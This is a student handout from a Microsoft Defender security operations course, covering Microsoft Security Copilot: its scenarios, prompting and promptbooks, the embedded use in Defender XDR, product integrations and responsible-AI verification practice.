M10 · Security Copilot

Course: Microsoft Defender — Security Operations Fundamentals Module duration: 3.5 hours (including lab) Format: Instructor-led, hands-on

Currency note (as of June 2026): Microsoft Security Copilot changes rapidly — embedded experiences, plugins/agents, and the standalone portal evolve on roughly a monthly cadence, and some features are [PREVIEW]. Verify capabilities, availability, and portal paths against current Microsoft Learn before relying on specifics; never present a preview feature as generally available.

Learning objectives

By the end of this module you will be able to:

  1. Describe Security Copilot’s capabilities and the security scenarios it supports.
  2. Write effective prompts for security investigations, summarization, and guided response.
  3. Use Copilot embedded in Defender XDR to accelerate an incident investigation.
  4. Explain how Copilot integrates with Defender, Sentinel, Intune, and other signals.

1. What Security Copilot is

Microsoft Security Copilot is a generative-AI assistant for security operations. It applies a large language model, grounded in Microsoft’s threat intelligence and your own security data, to help analysts investigate, summarize, and respond — in natural language. Two ways to use it:

  • Standalone portal — a dedicated experience (a chat-like surface) for open-ended investigation, promptbooks, and cross-product work.
  • Embedded experiences — Copilot capabilities surfaced inside other products (e.g., Defender XDR, Microsoft Intune, Microsoft Entra), so help appears in the context where you are already working.

Capacity note: Security Copilot runs on provisioned Security Compute Units (SCU). If your lab lacks SCU capacity, use the recorded walkthrough fallback the instructor provides — the concepts and prompting skills transfer regardless.

2. Supported scenarios

Security Copilot is built for security work, not general chat. Core scenarios:

  • Incident summarization — turn a complex, multi-alert incident into a readable narrative.
  • Script analysis — explain what a suspicious PowerShell/command-line script does, in plain language.
  • Threat intelligence lookup — ask about an actor, malware family, vulnerability, or indicator.
  • Guided response — get suggested next steps for containment and remediation.
  • Report generation — produce summaries for different audiences (e.g., an executive briefing).
  • KQL query assistance — generate or explain Kusto queries for hunting (ties to M02/M04).

3. Prompting fundamentals

Copilot’s output quality depends on the prompt. A few durable principles:

  • Be specific and natural — state what you want plainly: “Summarize incident 1234 and list the affected users and devices.”
  • Set context — name the entity, time window, and goal. More relevant context → better grounding.
  • Iterate with follow-ups — Copilot keeps session context; refine with “now show only the high-severity alerts” rather than restarting.
  • Ask for the format you need — “as a bulleted executive summary,” “as a table of IOCs.”
  • Always verify — treat output as a draft to confirm, not ground truth (see §6).
flowchart LR A["Set context<br/>(entity, time, goal)"] --> B["Ask a specific prompt"] B --> C["Review the response<br/>+ its evidence"] C --> D["Follow-up to refine"] D --> C C --> E["Verify before acting"]

Diagram alt text: A flow showing the prompting loop. Start by setting context — entity, time, goal. Then ask a specific prompt. Review the response and its evidence. A follow-up step loops back to reviewing as you refine. Finally, verify before acting.

Promptbooks

A promptbook is a saved sequence of prompts that automates a repeatable workflow — run the whole series with one action (e.g., a standard “triage this incident” sequence). Microsoft provides built-in promptbooks; you can create custom ones for your team’s recurring tasks. In the lab you will create a promptbook for a recurring investigation task.

4. Embedded Copilot in Defender XDR

Inside the Defender portal, Copilot accelerates the investigation you learned in M04:

  • Incident summary — an auto-generated narrative of the incident: what happened, which entities are involved, and the attack progression — drafted in seconds instead of read across many alerts.
  • Guided response — suggested response actions ranked for the situation.
  • Device/identity context — quick enrichment on the entities in the incident.

In the lab you will use embedded Copilot to summarize an active incident and generate a guided response, and use the standalone portal to analyze a suspicious script.

5. Integration signals

Copilot’s strength is breadth of grounding — it reasons over signals from across the Microsoft security estate (and beyond) via plugins/connectors (available integrations evolve; verify, as of June 2026):

  • Microsoft Defender XDR — incidents, alerts, device/entity data.
  • Microsoft Sentinel — SIEM incidents and log analytics (KQL).
  • Microsoft Intune — device compliance and configuration context.
  • Microsoft Entra — identity and identity-risk signals.
  • External threat intelligence — Microsoft Defender Threat Intelligence and other sources.

This cross-product reach is why Copilot can answer questions a single tool cannot — e.g., correlating an identity risk (Entra), a device state (Intune), and an incident (Defender XDR) in one summary.

6. Responsible AI

Generative AI assists judgment; it does not replace it.

  • Human-in-the-loop — review Copilot’s output and verify against the underlying evidence it cites before acting; do not auto-execute consequential actions on its say-so.
  • Know the limits — AI can be confidently wrong (“hallucinate”); confirm IOCs, technique mappings, and recommended actions against source data.
  • Data and governance — Copilot operates within your tenant’s permissions and data-handling controls; understand what data a prompt exposes.

Carry-through: the verification discipline from M01 (map behaviors carefully) and M04 (read the evidence in the incident graph) applies directly — Copilot speeds the work, you still own the verdict.

7. Module summary

  • Security Copilot is a generative-AI assistant for SecOps, available standalone and embedded (Defender XDR, Intune, Entra), running on SCU capacity.
  • Supported scenarios include incident summarization, script analysis, threat-intel lookup, guided response, report generation, and KQL assistance.
  • Effective prompting is specific, context-rich, iterative, and format-aware; promptbooks save repeatable prompt sequences.
  • Embedded Copilot in Defender XDR provides incident summaries, guided response, and entity context.
  • Copilot integrates signals across Defender, Sentinel, Intune, Entra, and external TI.
  • Responsible AI: keep a human in the loop, verify output against evidence, and respect data governance.

Glossary (first-use acronyms in this module)

  • IOC — Indicator of Compromise.
  • KQL — Kusto Query Language.
  • LLM — Large Language Model.
  • SCU — Security Compute Unit (Security Copilot’s capacity/billing unit).
  • TI — Threat Intelligence.
  • XDR — Extended Detection and Response.

Sources

Citations recorded per CLAUDE.md. Living documents; “as of June 2026” stamps indicate currency. Mark any preview capability [PREVIEW] and verify GA status before teaching as generally available.

  1. Microsoft Learn — “What is Microsoft Security Copilot?” https://learn.microsoft.com/copilot/security/microsoft-security-copilot
  2. Microsoft Learn — “Get started with Microsoft Security Copilot.” https://learn.microsoft.com/copilot/security/get-started-security-copilot
  3. Microsoft Learn — “Create effective prompts” / prompting guidance. https://learn.microsoft.com/copilot/security/prompting-tips
  4. Microsoft Learn — “Using promptbooks.” https://learn.microsoft.com/copilot/security/using-promptbooks
  5. Microsoft Learn — “Microsoft Security Copilot in Microsoft Defender XDR.” https://learn.microsoft.com/copilot/security/microsoft-defender-xdr
  6. Microsoft Learn — “Manage plugins / integrations in Security Copilot.” https://learn.microsoft.com/copilot/security/manage-plugins
  7. Microsoft — “Responsible AI FAQ for Security Copilot.” https://learn.microsoft.com/copilot/security/responsible-ai-overview-security-copilot

M10 of 10 · Microsoft Defender — Security Operations Fundamentals · maps to curriculum.md → M10 learning objectives 1–4. Student handout — distribute freely to learners. No answer keys contained.